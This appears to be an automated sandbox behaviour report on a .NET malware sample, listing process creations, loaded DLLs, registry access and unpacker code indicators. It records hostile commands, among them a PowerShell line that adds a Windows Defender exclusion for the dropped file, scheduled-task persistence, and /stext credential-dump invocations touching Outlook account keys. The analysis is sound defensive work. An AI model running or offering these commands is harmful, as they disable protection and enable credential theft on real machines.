                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: pstorec.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: LdSbZG1iH6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: LdSbZG1iH6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: LdSbZG1iH6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ZPyJ.pdb source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
                      Source: Binary string: ZPyJ.pdbSHA256 source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs.Net Code: Aj1Y1KAo8j System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.cs.Net Code: Aj1Y1KAo8j System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: LdSbZG1iH6.exeStatic PE information: 0xD19BF8C7 [Mon Jun 9 01:58:31 2081 UTC]
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 0_2_00F8EFB0 push esp; iretd 0_2_00F8EFB1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00457186 push ecx; ret 8_2_00457199
